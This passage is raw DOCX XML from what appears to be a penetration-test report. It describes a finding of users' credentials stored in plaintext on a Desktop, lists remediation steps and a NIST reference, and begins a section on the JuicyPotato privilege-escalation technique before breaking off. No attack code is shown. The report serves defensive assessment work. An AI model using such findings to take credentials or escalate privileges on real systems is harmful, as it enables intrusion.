                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1022: Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="77F10B4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D0D830" w14:textId="44F14D66">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0E05358" w14:textId="14D21304">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7CC5000B" w14:textId="0BF28826"/>
    <w:p w:rsidR="7B0ACD3E" w:rsidP="0D325B6E" w:rsidRDefault="7B0ACD3E" w14:paraId="6C757BB5" w14:textId="465C2B50">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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0ACD3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2B9F6AC" w:rsidP="0D325B6E" w:rsidRDefault="12B9F6AC" w14:paraId="4348F83E" w14:textId="2E1273DB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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B9F6AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System/Application</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12B9F6A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2B9F6AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12B9F6AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the credentials of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1023EA3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">other users stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE5061A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plain</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1023EA3F">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FE5061A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ext, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE5061A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>located</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5FE5061A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="04AD7E55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">n a file on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="04AD7E55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7E273751">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7F83C0A2" w14:textId="6998F943">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7B0ACD3E" w:rsidP="0D325B6E" w:rsidRDefault="7B0ACD3E" w14:paraId="331048E2" w14:textId="3B05556B">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7B0ACD3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F64B0C2" w:rsidP="0D325B6E" w:rsidRDefault="5F64B0C2" w14:paraId="60BC810F" w14:textId="3894EBFA">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F64B0C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Having insecurely stored credentials on the system </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4CC12691">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">without any proper form of encryption can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="033241F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>personal information leakage and potential privilege escalation depending on the privileges of the compromised accounts.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28729E1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since credential reuse is also a common vulnerability, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="779105DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an attacker could potentially move laterally across the network and compromise other accounts as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="508F49BE" w14:textId="170AB181">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7B0ACD3E" w:rsidP="0D325B6E" w:rsidRDefault="7B0ACD3E" w14:paraId="09463CEC" w14:textId="6EF5F92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0ACD3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53B73230" w14:textId="5E665D56">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7B0ACD3E" w:rsidP="0D325B6E" w:rsidRDefault="7B0ACD3E" w14:paraId="124E36E4" w14:textId="02CCCBB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0ACD3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7754444" w:rsidP="0D325B6E" w:rsidRDefault="67754444" w14:paraId="61DF5C6C" w14:textId="7DEFF8C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7754444">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Team-XX recommends</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="152BA603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30EF30AE" w:rsidP="0D325B6E" w:rsidRDefault="30EF30AE" w14:paraId="60447B15" w14:textId="6A61697A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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EF30AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All sensitive user credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74E594B6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A631EBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> be securely stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A631EBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appropriate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1A631EBC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, protected locations</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63AB2A6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and never in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63AB2A6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unsecured</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="63AB2A6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="30EF30AE" w:rsidP="0D325B6E" w:rsidRDefault="30EF30AE" w14:paraId="2959BFC4" w14:textId="15AE7683">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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EF30AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All sensitive data should be encrypted at rest</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="448D5465">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confidentiality, integrity, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="448D5465">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prevent</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="448D5465">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="15A05649" w14:textId="43306711">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p>
    <w:p w:rsidR="7B6E795D" w:rsidP="0D325B6E" w:rsidRDefault="7B6E795D" w14:paraId="113BCA0F" w14:textId="34C5891F">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7B6E795D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6071D8D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eferences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D4EFAFF" w:rsidP="0D325B6E" w:rsidRDefault="1D4EFAFF" w14:paraId="0DBB3BE8" w14:textId="0659A155">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R472a8aba83724e43">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1D4EFAFF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NIST - Data Confidentiality: Identifying and Protecting Assets Against Data Breaches</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1D4EFAFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3CA2A222" w14:textId="290C4260">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004001A6" w:rsidP="0D325B6E" w:rsidRDefault="004001A6" w14:paraId="5E7F725E" w14:textId="49AE497E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1004622030" w:id="783260588"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="004001A6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="004001A6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1824242377" w:id="1771233334"/>
      <w:bookmarkStart w:name="_Toc250116991" w:id="669508479"/>
      <w:bookmarkStart w:name="_Toc1918993560" w:id="417078343"/>
      <w:bookmarkStart w:name="_Toc45607421" w:id="1741060225"/>
      <w:bookmarkStart w:name="_Toc838588571" w:id="1337972396"/>
      <w:bookmarkStart w:name="_Toc1352079353" w:id="1250400321"/>
      <w:bookmarkStart w:name="_Toc2098685933" w:id="1907493002"/>
      <w:bookmarkStart w:name="_Toc214220296" w:id="25584842"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46EC6142">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2B0F08E3">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JuicyPotato</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1250400321"/>
      <w:bookmarkEnd w:id="1907493002"/>
      <w:bookmarkEnd w:id="25584842"/>
      <w:bookmarkEnd w:id="1771233334"/>
      <w:bookmarkEnd w:id="669508479"/>
      <w:bookmarkEnd w:id="417078343"/>
      <w:bookmarkEnd w:id="1741060225"/>
      <w:bookmarkEnd w:id="1337972396"/>
      <w:bookmarkEnd w:id="78326058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54D783C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8506608" w14:textId="0FBC588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9133698" w14:textId="3B52FC3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A7A2CD" w14:textId="28ADD21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5FD173C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2074A2" w14:textId="61EF1F7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A4D487E" w14:textId="747B4645">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E24876E" w14:textId="12DCBBC8">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9.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="3E7E78C2">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952B1BF" w14:textId="3590E996">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068477C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2011063" w14:textId="600F184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8A37941" w:rsidP="0D325B6E" w:rsidRDefault="68A37941" w14:paraId="10C29562" w14:textId="293C9B94">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="68A37941">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
